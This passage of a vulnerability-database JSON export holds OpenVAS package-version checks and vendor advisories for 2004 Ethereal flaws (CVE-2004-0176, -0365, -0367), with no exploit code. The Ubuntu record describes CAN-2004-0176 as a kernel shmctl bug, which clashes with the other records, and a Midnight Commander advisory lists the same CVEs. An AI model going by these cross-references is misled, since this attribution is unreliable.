GLSA 200403-07.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-24T00:00:00", "title": "Gentoo Security Advisory GLSA 200403-07 (ethereal)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0367", "CVE-2004-0365", "CVE-2004-0176"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=54532", "id": "OPENVAS:54532", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple overflows and vulnerabilities exist in Ethereal which may allow an\nattacker to crash the program or run arbitrary code.\";\ntag_solution = \"All users should upgrade to the current version of the affected package:\n\n # emerge sync\n \n # emerge -pv '>=net-analyzer/ethereal-0.10.3'\n # emerge '>=net-analyzer/ethereal-0.10.3'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200403-07\nhttp://bugs.gentoo.org/show_bug.cgi?id=45543\nhttp://www.ethereal.com/appnotes/enpa-sa-00013.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200403-07.\";\n\n \n\nif(description)\n{\n script_id(54532);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2004-0176\", \"CVE-2004-0365\", \"CVE-2004-0367\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200403-07 (ethereal)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-analyzer/ethereal\", unaffected: make_list(\"ge 0.10.3\"), vulnerable: make_list(\"le 0.10.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:11", "references": ["http://www.vuxml.org/freebsd/cdf18ed9-7f4a-11d8-9645-0020ed76ef5a.html", "http://secunia.com/advisories/11185", "http://security.e-matters.de/advisories/032004.html", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "pluginID": "52432", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-04T00:00:00", "title": "FreeBSD Ports: ethereal, tethereal", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0367", "CVE-2004-0365", "CVE-2004-0176"], "modified": "2016-09-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=52432", "id": "OPENVAS:52432", "sourceData": "#\n#VID cdf18ed9-7f4a-11d8-9645-0020ed76ef5a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n ethereal\n tethereal\n\nCVE-2004-0176\nMultiple buffer overflows in Ethereal 0.8.13 to 0.10.2 allow remote\nattackers to cause a denial of service and possibly execute arbitrary\ncode via the (1) NetFlow, (2) IGAP, (3) EIGRP, (4) PGM, (5) IrDA, (6)\nBGP, (7) ISUP, or (8) TCAP dissectors.\n\nCVE-2004-0365\nThe dissect_attribute_value_pairs function in packet-radius.c for\nEthereal 0.8.13 to 0.10.2 allows remote attackers to cause a denial of\nservice (crash) via a malformed RADIUS packet that triggers a null\ndereference.\n\nCVE-2004-0367\nEthereal 0.10.1 to 0.10.2 allows remote attackers to cause a denial of\nservice (crash) via a zero-length Presentation protocol selector.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52432);\n script_version(\"$Revision: 4078 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-16 07:34:17 +0200 (Fri, 16 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2004-0176\", \"CVE-2004-0365\", \"CVE-2004-0367\");\n script_bugtraq_id(9952);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: ethereal, tethereal\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://www.ethereal.com/appnotes/enpa-sa-00013.html\");\n script_xref(name : \"URL\" , value : \"http://security.e-matters.de/advisories/032004.html\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/11185\");\n script_xref(name : \"URL\" , value : \"http://www.vuxml.org/freebsd/cdf18ed9-7f4a-11d8-9645-0020ed76ef5a.html\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"ethereal\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.10.3\")<0) {\n txt += 'Package ethereal version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"tethereal\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.10.3\")<0) {\n txt += 'Package tethereal version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:16:11", "references": ["http://www.osvdb.org/4462", "http://www.osvdb.org/4464", "http://secunia.com/advisories/11185", "http://security.e-matters.de/advisories/032004.html", "http://www.osvdb.org/4463", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "0.10.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "ethereal", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "0.10.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "tethereal", "operator": "lt"}], "description": "\nStefan Esser of e-matters Security discovered a baker's dozen\n\t of buffer overflows in Ethereal's decoders, including:\n\nNetFlow\nIGAP\nEIGRP\nPGM\nIRDA\nBGP\nISUP\nTCAP\nUCP\n\nIn addition, a vulnerability in the RADIUS decoder was found\n\t by Jonathan Heusser.\nFinally, there is one uncredited vulnerability described by the\n\t Ethereal team as:\n\nA zero-length Presentation protocol selector could make\n\t Ethereal crash.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2004-03-23T00:00:00", "title": "multiple vulnerabilities in ethereal", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2004-0367", "CVE-2004-0365", "CVE-2004-0176"], "modified": "2004-07-11T00:00:00", "id": "CDF18ED9-7F4A-11D8-9645-0020ED76EF5A", "href": "https://vuxml.freebsd.org/freebsd/cdf18ed9-7f4a-11d8-9645-0020ed76ef5a.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:17", "references": ["http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0176", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0367", "https://bugs.gentoo.org/show_bug.cgi?id=45543", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0365", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "0.10.2", "packageName": "net-analyzer/ethereal", "packageFilename": "UNKNOWN", "arch": "all", "operator": "le"}], "description": "### Background\n\nQuote from http://www.ethereal.com \n\n\"Ethereal is used by network professionals around the world for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product. Its open source license allows talented experts in the networking community to add enhancements. It runs on all popular computing platforms, including Unix, Linux, and Windows.\" \n\n### Description\n\nThere are multiple vulnerabilities in versions of Ethereal earlier than 0.10.3, including:\n\n * Thirteen buffer overflows in the following protocol dissectors: NetFlow, IGAP, EIGRP, PGM, IrDA, BGP, ISUP, and TCAP.\n * A zero-length Presentation protocol selector could make Ethereal crash.\n * A vulnerability in the RADIUS packet dissector which may crash ethereal.\n * A corrupt color filter file could cause a segmentation fault.\n\n### Impact\n\nThese vulnerabilities may cause Ethereal to crash or may allow an attacker to run arbitrary code on the user's computer. \n\n### Workaround\n\nWhile a workaround is not currently known for this issue, all users are advised to upgrade to the latest version of the affected package. \n\n### Resolution\n\nAll users should upgrade to the current version of the affected package: \n \n \n # emerge sync\n \n # emerge -pv \">=net-analyzer/ethereal-0.10.3\"\n # emerge \">=net-analyzer/ethereal-0.10.3\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2004-03-28T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Multiple remote overflows and vulnerabilities in Ethereal", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0367", "CVE-2004-0365", "CVE-2004-0176"], "modified": "2004-03-28T00:00:00", "id": "GLSA-200403-07", "href": "https://security.gentoo.org/glsa/200403-07", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-09-09T00:20:18", "references": ["http://oss.sgi.com/archives/netdev/2005-01/msg01036.html", "https://people.canonical.com/~ubuntu-security/cve/CVE-2005-0177", "https://people.canonical.com/~ubuntu-security/cve/CVE-2005-0176", "https://people.canonical.com/~ubuntu-security/cve/CVE-2005-0178"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-686-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-amd64-k8", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-amd64-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-power3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-power3-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-386", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-power4-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-amd64-xeon", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-k7-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-amd64-k8-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-686", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-power4", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-powerpc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-source-2.6.8.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.8.1-5-k7", "operator": "lt"}], "description": "CAN-2004-0176:\n\nMichael Kerrisk noticed an insufficient permission checking in the shmctl() function. Any process was permitted to lock/unlock any System V shared memory segment that fell within the the RLIMIT_MEMLOCK limit (that is the maximum size of shared memory that unprivileged users can acquire). This allowed am unprivileged user process to unlock locked memory of other processes, thereby allowing them to be swapped out. Usually locked shared memory is used to store passphrases and other sensitive content which must not be written to the swap space (where it could be read out even after a reboot).\n\nCAN-2005-0177:\n\nOGAWA Hirofumi noticed that the table sizes in nls_ascii.c were incorrectly set to 128 instead of 256. This caused a buffer overflow in some cases which could be exploited to crash the kernel.\n\nCAN-2005-0178:\n\nA race condition was found in the terminal handling of the \u201csetsid()\u201d function, which is used to start new process sessions.\n\n<http://oss.sgi.com/archives/netdev/2005-01/msg01036.html:>\n\nDavid Coulson noticed a design flaw in the netfilter/iptables module. By sending specially crafted packets, a remote attacker could exploit this to crash the kernel or to bypass firewall rules.\n\nFixing this vulnerability required a change in the Application Binary Interface (ABI) of the kernel. This means that third party user installed modules might not work any more with the new kernel, so this fixed kernel has a new ABI version number. You have to recompile and reinstall all third party modules.", "edition": 5, "reporter": "Ubuntu", "published": "2005-02-15T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2005-0176", "CVE-2004-0176", "CVE-2005-0449", "CVE-2005-0177", "CVE-2005-0178"], "modified": "2005-02-15T00:00:00", "id": "USN-82-1", "href": "https://usn.ubuntu.com/82-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:40:54", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.10.3-0.30E.1", "arch": "ia64", "packageName": "ethereal-gnome", "packageFilename": "ethereal-gnome-0.10.3-0.30E.1.ia64.rpm", "operator": "lt"}], "description": "Ethereal is a program for monitoring network traffic.\n\nStefan Esser reported that Ethereal versions 0.10.1 and earlier contain\nstack overflows in the IGRP, PGM, Metflow, ISUP, TCAP, or IGAP dissectors.\n On a system where Ethereal is being run a remote attacker could send\nmalicious packets that could cause Ethereal to crash or execute arbitrary\ncode. The Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0176 to this issue.\n\nJonathan Heussser discovered that a carefully-crafted RADIUS packet could\ncause a crash. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0365 to this issue.\n\nEthereal 0.8.13 to 0.10.2 allows remote attackers to cause a denial of\nservice (crash) via a zero-length Presentation protocol selector. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\nthe name CAN-2004-0367 to this issue.\n\nUsers of Ethereal should upgrade to these updated packages, which contain\na version of Ethereal that is not vulnerable to these issues.", "reporter": "RedHat", "published": "2004-03-30T05:00:00", "type": "redhat", "title": "(RHSA-2004:136) ethereal security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2004-0176", "CVE-2004-0365", "CVE-2004-0367", "CVE-2004-1761"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-11T23:27:31", "id": "RHSA-2004:136", "href": "https://access.redhat.com/errata/RHSA-2004:136", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:40:16", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.6.0-327", "arch": "i586", "packageFilename": "mc-4.6.0-327.i586.rpm", "packageName": "mc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.1", "packageVersion": "4.5.55-758", "arch": "i586", "packageFilename": "mc-4.5.55-758.i586.rpm", "packageName": "mc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.0", "packageVersion": "4.5.55-758", "arch": "i386", "packageFilename": "mc-4.5.55-758.i386.rpm", "packageName": "mc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.2", "packageVersion": "4.6.0-327", "arch": "i586", "packageFilename": "mc-4.6.0-327.i586.rpm", "packageName": "mc", "operator": "lt"}], "description": "The Midnight Commander (mc) is a file manager for the console. The mc code is vulnerable to several security related bugs like buffer overflows, incorrect format string handling and insecure usage of temporary files. These bugs can be exploited by local users to gain access to the privileges of the user running mc.", "edition": 1, "reporter": "Suse", "published": "2004-05-14T14:09:57", "title": "local privilege escalation in mc", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0367", "CVE-2004-0176", "CVE-2004-0232", "CVE-2004-0400", "CVE-2004-0113", "CVE-2004-0226", "CVE-2004-0174", "CVE-2003-0020", "CVE-2004-0231"], "modified": "2004-05-14T14:09:57", "id": "SUSE-SA:2004:012", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-05/msg00007.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}